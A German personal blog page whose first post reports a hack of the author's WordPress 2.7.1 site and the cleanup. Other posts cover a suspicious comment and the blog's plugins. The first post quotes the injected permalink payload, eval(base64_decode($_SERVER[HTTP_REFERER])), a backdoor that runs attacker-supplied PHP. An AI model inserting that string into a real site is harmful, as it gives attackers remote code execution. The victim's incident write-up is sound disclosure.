Media Addicted

Traurig aber wahr: es hat den Anschein, dass mein kleines Blog am Mittwoch um 2:16 Uhr morgens Opfer einer Attacke wurde. Es begann mit der Registrierung eines Benutzers namens “MikeWink”. Danach hatten alle Links im Blog ein Anhängsel in der Form

http://www.example.com/posttitle/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Der Browser reagiert für jeden Klick auf jeden beliebigen Link mit “Internal Server Error 500″. Man konnte im Blog also nicht mehr navigieren (jeder Link war wie oben beschrieben manipuliert), sondern nur noch die Startseite aufrufen. Bemerkt habe ich den Zustand Donnerstag nachmittag und direkt behoben, indem ich “einfach” im Admin Panel die Permalink-Struktur wieder zurückgesetzt habe auf meinen Standard (dort war der o.g. Code einfach hinzugefügt worden, wie auch immer das geht.

Die Attacke nutzte wohl eine Schwäche in der WordPress-Version 2.7.1, die ich deswegen noch nicht geupdated hatte, weil von Problemen mit dem 2.8.x-Strang berichtet wurde. Lesenswerte Details finden sich beim Fiesen Admin.

MIttlerweile habe ich das Problem oberflächlich behoben, meint: neue Passwörter für Datenbank, FTP, Admin-Bereich. Allerdings scheint der Hack tiefer in die Datenbank zu reichen und hier -Asche auf mein Haupt- ist das letzte Backup von April diesen Jahres, weil still und unbemerkt das Backup-Plugin nach dem Update auf 2.7.1 aufgehört hat, wöchentlich Mail mit einem Backup im Anhang zu schicken. Und da diese Mails automatisch wegsortiert und als “gelesen” marktiert werden… (Update: Lucky Bastard! Sie wurden von da an nur auf einen Ordner auf dem Server gespeichert, statt sie zu verschicken )

Es ist doch zum ko**** mit diesen scheiß Hackern bzw. hier eher SkriptKiddies, warum können die nicht einfach irgendwo hingehen und sterben?

Update – Was nicht hilft…

Interessant. Das hat in meinem Blog funktioniert, obwohl die Benutzerregistrierung schon vorher deaktiviert war…

Update 2 – Tracking it down + Gegenmaßnahmen

Weiterlesen »

• Bookmark on Delicious
• Digg this post
• Recommend on Facebook
• Buzz it up
• Share on Linkedin
• Share via MySpace
• share via Reddit
• Share with Stumblers
• Tumblr it
• Tweet about it
• Subscribe to the comments on this post
• Tell a friend
• Print for later

Gestern abend habe ich eine E-Mail-Benachrichtigung über einen neuen Kommentar erhalten. Dieser lautete:

width=”495″ height=”108″ alt=”" title=”" />

Ist ja jetzt nichts Wildes – denkt man im ersten Moment. Aber das Bloggerhirn ist mittlerweile so versaut, dass nur wenige Sekunden später eine ganze Kaskade kritischer Gedanken durch den Schädel jagt, die einem die nächsten 15 Minuten ganz sicher beschäftigen und auch Tage danach noch hier und da hochkommen.

1. Warum schreibt jemand so einen Kommentar unter einen so techniklastigen, also eher “neutralen” und daher meinungstechnisch unkritischen Beitrag?
2. Wer steckt hinter www.westerwelle.com?
3. WARUM ZUM TEUFEL MUSS DAS AUSGERECHNET EIN JURIST SEIN!?
4. Würde sich ein Jurist so undifferenziert äußern?
5. Will dieser Jurist wohlmöglich durch einen Eintrag mit verunglimpfendem Inhalt über seine eigene Person eine abmahnungsfähige Situation herstellen?
6. Warum ich?

Egal, könnte man jetzt sagen, das alles bietet ja keinerlei Beweis für Irgendetwas, das man abmahnen könnte? Ganz sicher??? Nein, sicher sein kann man da eben nicht, denn irgendwelchen unterbeschäftigten Juristen fällt sicherlich immer irgendwas ein, wie sie sich bereichern können.

Und solange solche Damoklesschwerter permanent über jedem Blogger schweben, solange macht das nicht so richtig Spaß. Helfen tut da nur 100%ige Anonymität oder ein paar Gesetzesänderungen hier und da…

• Bookmark on Delicious
• Digg this post
• Recommend on Facebook
• Buzz it up
• Share on Linkedin
• Share via MySpace
• share via Reddit
• Share with Stumblers
• Tumblr it
• Tweet about it
• Subscribe to the comments on this post
• Tell a friend
• Print for later

Vielleicht fragt sich der ein oder andere, welche Plugins auf media-addicted.de unter der Haube werkeln. Eines vorweg: es sind eine Menge. Unten findet ihr eine Listenaufstellung – generiert von einem Plugin Viel Spaß beim ausprobieren.

[stats_pluginsused]

Aktive Plugins

[active_pluginsused]

Deaktivierte Plugins

[inactive_pluginsused]

• Bookmark on Delicious
• Digg this post
• Recommend on Facebook
• Buzz it up
• Share on Linkedin
• Share via MySpace
• share via Reddit
• Share with Stumblers
• Tumblr it
• Tweet about it
• Subscribe to the comments on this post
• Tell a friend
• Print for later